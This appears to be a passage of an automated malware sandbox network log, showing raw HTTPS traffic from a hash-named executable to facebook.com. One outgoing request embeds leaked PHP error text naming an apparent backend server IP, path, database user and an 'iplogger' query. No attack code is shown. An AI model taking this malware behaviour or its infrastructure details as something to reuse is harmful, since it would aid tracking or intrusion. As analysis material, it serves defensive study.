p?u=https\u00253A\u00252F\u00252Fsupport.microsoft.com\u00252Fen-ie\u00252Fhelp\u00252F17442\u00252Fwindows-internet-explorer-delete-manage-cookies&h=AT3h2CJ7kOT_DtT56M2IBvpC38wVbc5HjnLp-Hnu0CyB4ItbKCLwz4rrGSOM8LzEKVRoER_Y5CPnQhwwZd47RWiKLucncu_GXaOIQ
2022-10-07 13:59:47 UTC	999	IN	Data Raw: 71 5f 44 6c 7a 5f 78 77 32 6a 36 59 46 65 49 62 79 69 65 56 4d 54 64 5f 66 6b 4e 33 77 6e 48 30 59 6c 77 78 74 50 47 30 34 44 4f 4d 51 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 68 6f 76 65 72 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 Data Ascii: q_Dlz_xw2j6YFeIbyieVMTd_fkN3wnH0YlwxtPG04DOMQ\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"hover\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnew
2022-10-07 13:59:47 UTC	1001	IN	Data Raw: 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 33 5f 76 64 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 4b 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 55 50 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 52 34 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 64 61 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 Data Ascii: ,1],["__markup_3310c079_0_3_vd",{"__html":"English (UK)"},1],["__markup_3310c079_0_4_UP",{"__html":"English (US)"},1],["__markup_3310c079_0_5_R4",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_da",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__marku
2022-10-07 13:59:47 UTC	1002	IN	Data Raw: 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 71 5f 61 75 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 65 32 30 5c 75 30 65 33 32 5c 75 30 65 32 39 5c 75 30 65 33 32 5c 75 30 65 34 34 5c 75 30 65 31 37 5c 75 30 65 32 32 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 72 5f 7a 66 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 78 34 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 47 6d Data Ascii: ["__markup_3310c079_0_q_au",{"__html":"\u0e20\u0e32\u0e29\u0e32\u0e44\u0e17\u0e22"},1],["__markup_3310c079_0_r_zf",{"__html":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_x4",{"__html":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_Gm
2022-10-07 13:59:47 UTC	1004	IN	Data Raw: 6c 71 34 22 2c 22 65 66 5f 70 61 67 65 22 3a 6e 75 6c 6c 2c 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 44 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 3a 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5f 70 63 6f 6e 6e 65 63 74 28 29 3a 5c 75 30 30 32 35 32 30 54 68 65 5c 75 30 30 32 35 32 30 6d 79 73 71 6c 5c 75 30 30 32 35 32 30 65 78 74 65 6e 73 69 6f 6e 5c 75 30 30 32 35 32 30 69 73 5c 75 30 30 32 35 32 30 64 65 70 72 65 63 61 74 65 64 5c 75 30 30 32 35 32 30 61 6e 64 5c 75 30 30 Data Ascii: lq4","ef_page":null,"uri":"https:\/\/www.facebook.com\/\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cb\u00253EDeprecated\u00253C\/b\u00253E:\u002520\u002520mysql_pconnect():\u002520The\u002520mysql\u002520extension\u002520is\u002520deprecated\u002520and\u00
2022-10-07 13:59:47 UTC	1005	IN	Data Raw: 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f 72 3d 2d 2d 73 61 6e 69 74 69 7a 65 64 2d 2d 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 50 34 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 50 34 22 7d 5d 5d 2c 5b 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 57 65 62 56 69 72 74 75 61 6c 43 75 72 73 6f 72 43 6c 69 63 6b 4c 6f 67 67 65 72 22 Data Ascii: A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520color=--sanitized--"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_P4"],[{"__m":"__elem_a588f507_0_0_P4"}]],["AccessibilityWebVirtualCursorClickLogger"
2022-10-07 13:59:47 UTC	1007	IN	Data Raw: 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 66 34 36 66 34 39 34 36 5f 30 5f 31 5f 55 56 22 7d 5d 5d 2c 5b 22 4c 6f 67 69 6e 46 6f 72 6d 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 61 61 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 39 32 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 61 61 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 32 5f 39 32 22 7d 2c 6e 75 6c 6c 2c 74 72 75 65 2c 7b 22 70 75 62 4b 65 79 22 3a 7b 22 70 75 62 6c 69 63 4b 65 79 22 3a 22 30 63 30 35 34 64 38 65 62 34 61 62 30 37 62 35 32 33 63 36 61 64 62 35 30 35 61 37 36 35 38 36 34 61 37 Data Ascii: ,[{"__m":"__elem_f46f4946_0_1_UV"}]],["LoginFormController","init",["__elem_835c633a_0_0_aa","__elem_45d73b5d_0_2_92"],[{"__m":"__elem_835c633a_0_0_aa"},{"__m":"__elem_45d73b5d_0_2_92"},null,true,{"pubKey":{"publicKey":"0c054d8eb4ab07b523c6adb505a765864a7
2022-10-07 13:59:47 UTC	1008	IN	Data Raw: 22 5f 5f 65 6c 65 6d 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 37 41 22 7d 2c 66 61 6c 73 65 5d 5d 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 52 75 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 52 75 6e 29 7b 52 75 6e 2e 6f 6e 41 66 74 65 72 4c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 2e 63 6c 65 61 6e 75 70 28 54 69 6d 65 53 6c 69 63 65 29 7d 29 7d 29 3b 7d 29 3b 0a 0a 6f 6e 6c 6f 61 64 52 65 67 69 73 74 65 72 5f 44 45 50 52 45 43 41 54 45 44 28 66 75 6e 63 74 69 6f 6e 20 28 29 7b 74 72 79 20 7b 20 24 28 22 65 6d 61 69 6c 22 29 2e 66 6f 63 75 73 28 29 3b 20 7d 20 63 61 74 63 68 20 28 5f 69 67 6e 6f 72 65 29 20 7b 20 7d 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 6e 6f 77 5f 69 6e 6c 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 Data Ascii: "__elem_9f5fac15_0_0_7A"},false]]});requireLazy(["Run"],function(Run){Run.onAfterLoad(function(){s.cleanup(TimeSlice)})});});onloadRegister_DEPRECATED(function (){try { $("email").focus(); } catch (_ignore) { }});</script><script>now_inl=(function(){va
2022-10-07 13:59:47 UTC	1009	IN	Data Raw: 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 72 2f 74 6a 49 55 4a 55 51 38 36 4d 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 4f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 5a 33 Data Ascii: 5Kz" as="script" nonce="9AjGJDy2" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/r/tjIUJUQ86MO.js?_nc_x=Ij3Wp8lg5Kz" as="script" nonce="9AjGJDy2" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/Z3
2022-10-07 13:59:47 UTC	1011	IN	Data Raw: 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 7b 64 69 73 70 6c 61 79 52 65 73 6f 75 72 63 65 73 3a 5b 22 51 4d 6d 34 47 43 6d 22 2c 22 62 7a 34 30 48 6f 72 22 2c 22 4a 4f 4c 4c 30 34 32 22 2c 22 6d 78 53 6b 66 38 42 22 2c 22 6e 36 57 34 78 4d 48 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 68 33 5a 7a 41 6d 47 22 2c 22 6f 42 2f 79 58 67 33 22 2c 22 64 41 78 58 30 6a 6a 22 2c 22 63 59 55 33 63 33 32 22 2c 22 34 42 47 54 6d 43 37 22 2c 22 56 4b 39 6b 6a 61 74 22 2c 22 73 35 2b Data Ascii: cript nonce="9AjGJDy2">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletArrive({displayResources:["QMm4GCm","bz40Hor","JOLL042","mxSkf8B","n6W4xMH","8zbEZtu","hKY0QKT","vGt2mxz","h3ZzAmG","oB/yXg3","dAxX0jj","cYU3c32","4BGTmC7","VK9kjat","s5+
2022-10-07 13:59:47 UTC	1012	IN	Data Raw: 32 32 63 38 0d 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 6c 61 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 39 41 6a 47 4a 44 79 32 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 6f 6e 50 61 67 65 6c 65 74 41 Data Ascii: 22c8<script nonce="9AjGJDy2">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("last_response",n);})})();</script><script nonce="9AjGJDy2">requireLazy(["__bigPipe"],(function(bigPipe){bigPipe.onPageletA
2022-10-07 13:59:47 UTC	1013	IN	Data Raw: 59 30 42 71 5f 73 77 53 4f 4f 77 30 70 6f 4a 54 7a 59 53 6e 73 70 55 34 4e 61 6c 4c 63 65 78 32 79 78 4c 5a 49 4a 73 4e 6f 68 75 70 4c 32 73 56 65 76 44 68 64 31 4c 76 4e 55 5f 52 6e 51 47 31 56 65 52 66 69 6c 39 4b 41 6f 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 36 22 2c 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 58 41 73 79 6e 63 52 65 71 75 65 73 74 22 2c 22 41 61 33 65 53 67 54 42 36 53 31 6e 73 75 5a 5f 4a 59 30 42 71 5f 73 77 53 4f 4f 77 30 70 6f 4a 54 7a 59 53 6e 73 70 55 34 4e 61 6c 4c 63 65 78 32 79 78 4c 5a 49 4a 73 4e 6f 68 75 70 4c 32 73 56 65 76 44 68 64 31 4c 76 4e 55 5f 52 6e 51 47 31 56 65 52 66 69 6c 39 4b 41 6f 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 30 38 33 31 31 37 22 2c 5b 5d 2c 7b Data Ascii: Y0Bq_swSOOw0poJTzYSnspU4NalLcex2yxLZIJsNohupL2sVevDhd1LvNU_RnQG1VeRfil9KAo"]},-1],["cr:1083116",["XAsyncRequest"],{__rc:["XAsyncRequest","Aa3eSgTB6S1nsuZ_JY0Bq_swSOOw0poJTzYSnspU4NalLcex2yxLZIJsNohupL2sVevDhd1LvNU_RnQG1VeRfil9KAo"]},-1],["cr:1083117",[],{
2022-10-07 13:59:47 UTC	1015	IN	Data Raw: 43 33 5a 64 6f 76 47 64 4a 75 4f 35 56 4f 48 6f 57 79 58 59 43 59 69 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 42 61 6e 7a 61 69 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 4d 41 58 5f 53 49 5a 45 3a 31 30 30 30 30 2c 4d 41 58 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 4d 49 4e 5f 57 41 49 54 3a 6e 75 6c 6c 2c 52 45 53 54 4f 52 45 5f 57 41 49 54 3a 31 35 30 30 30 30 2c 62 6c 61 63 6b 6c 69 73 74 3a 5b 22 74 69 6d 65 5f 73 70 65 6e 74 22 5d 2c 64 69 73 61 62 6c 65 64 3a 66 61 6c 73 65 2c 67 6b 73 3a 7b 62 6f 6f 73 74 65 64 5f 70 61 67 65 6c 69 6b 65 73 3a 74 72 75 65 2c 6d 65 72 63 75 72 79 5f 73 65 6e 64 5f 65 72 72 6f 72 5f 6c 6f 67 67 69 6e 67 3a 74 72 75 65 2c 70 6c 61 74 66 6f 72 6d 5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70 Data Ascii: C3ZdovGdJuO5VOHoWyXYCYig"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,grap
2022-10-07 13:59:47 UTC	1016	IN	Data Raw: 67 4e 6d 70 5f 39 32 42 43 4e 55 5f 64 57 69 5a 34 4b 51 39 48 66 57 47 55 43 75 53 63 33 58 43 30 4d 31 41 6c 6d 66 74 6a 31 46 44 52 56 64 66 56 4f 6e 46 5a 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 51 45 4f 44 4f 6f 74 63 4e 63 44 68 32 54 61 6a 39 76 55 58 5f 36 43 71 59 6f 52 72 35 6d 7a 44 71 78 47 54 65 53 4f 59 38 6d 47 68 56 68 6d 39 6b 32 57 51 66 69 4f 43 33 5a 64 6f 76 47 64 4a 75 4f 35 56 4f 48 6f 57 79 58 59 43 59 69 67 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e Data Ascii: gNmp_92BCNU_dWiZ4KQ9HfWGUCuSc3XC0M1Almftj1FDRVdfVOnFZA"]},-1],["cr:983844",[],{__rc:[null,"Aa3QEODOotcNcDh2Taj9vUX_6CqYoRr5mzDqxGTeSOY8mGhVhm9k2WQfiOC3ZdovGdJuO5VOHoWyXYCYig"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMForked-prod.
2022-10-07 13:59:47 UTC	1018	IN	Data Raw: 52 66 69 6c 39 4b 41 6f 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 33 65 53 67 54 42 36 53 31 6e 73 75 5a 5f 4a 59 30 42 71 5f 73 77 53 4f 4f 77 30 70 6f 4a 54 7a 59 53 6e 73 70 55 34 4e 61 6c 4c 63 65 78 32 79 78 4c 5a 49 4a 73 4e 6f 68 75 70 4c 32 73 56 65 76 44 68 64 31 4c 76 4e 55 5f 52 6e 51 47 31 56 65 52 66 69 6c 39 4b 41 6f 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 4e 61 76 69 67 61 74 69 Data Ascii: Rfil9KAo"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa3eSgTB6S1nsuZ_JY0Bq_swSOOw0poJTzYSnspU4NalLcex2yxLZIJsNohupL2sVevDhd1LvNU_RnQG1VeRfil9KAo"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["Navigati
2022-10-07 13:59:47 UTC	1019	IN	Data Raw: 41 25 33 43 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 66 66 30 30 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 2c 73 65 72 76 65 72 4c 49 44 3a 22 37 31 35 31 37 36 39 38 39 31 31 35 37 30 38 32 33 35 33 22 7d 5d 5d 2c 5b 22 46 61 6c 63 6f 4c 6f 67 67 65 72 54 72 61 6e 73 70 6f 72 74 73 22 2c 22 61 74 74 61 63 68 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 43 6c 69 63 6b 52 65 66 4c 6f 67 67 65 72 22 5d 2c 5b 22 44 65 74 65 63 74 42 72 6f 6b 65 6e 50 72 6f 78 79 43 Data Ascii: A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E",serverLID:"7151769891157082353"}]],["FalcoLoggerTransports","attach",[],[]],["ClickRefLogger"],["DetectBrokenProxyC

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49718	185.60.216.35	443	C:\Users\user\Desktop\38b2c7a1af454d382927f81543d86055886bc02863457.exe

Timestamp	kBytes transferred	Direction	Data
2022-10-07 13:59:49 UTC	1020	OUT	GET /%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E HTTP/1.1 Connection: Keep-Alive Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36 Host: www.facebook.com
2022-10-07 13:59:49 UTC	1022	IN	HTTP/1.1 404 Not Found Vary: Accept-Encoding report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]} x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: same-origin cross-origin-opener-policy: same-origin-allow-popups Pragma: no-cache Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 0 X-Frame-Options: DENY Strict-Transport-Security: max-age=15552000; preload Content-Type: text/html; charset="utf-8" X-FB-Debug: 9skqJ1JFSpjkJ/zsqE8GOPq+sptKl4fXoq63U/BCKPasZ+Rpm+FBVuq1Aq/8JNO5OvOVpl+EoqwCQZ3r+bRweg== Date: Fri, 07 Oct 2022 13:59:49 GMT Transfer-Encoding: chunked Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Connection: close
2022-10-07 13:59:49 UTC	1023	IN	Data Raw: 38 36 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 69 64 3d 22 66 61 63 65 62 6f 6f 6b 22 20 63 6c 61 73 73 3d 22 6e 6f 5f 6a 73 22 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 22 20 69 64 3d 22 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 20 2f 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 47 52 65 62 35 33 68 65 22 3e 66 75 6e 63 74 69 6f 6e 20 65 6e 76 46 6c 75 73 68 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 62 29 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 61 29 62 5b 63 5d 3d 61 5b 63 5d 7d 77 69 6e 64 6f 77 2e 72 65 71 75 69 72 Data Ascii: 86d<!DOCTYPE html><html lang="en" id="facebook" class="no_js"><head><meta charset="utf-8" /><meta name="referrer" content="default" id="meta_referrer" /><script nonce="GReb53he">function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requir
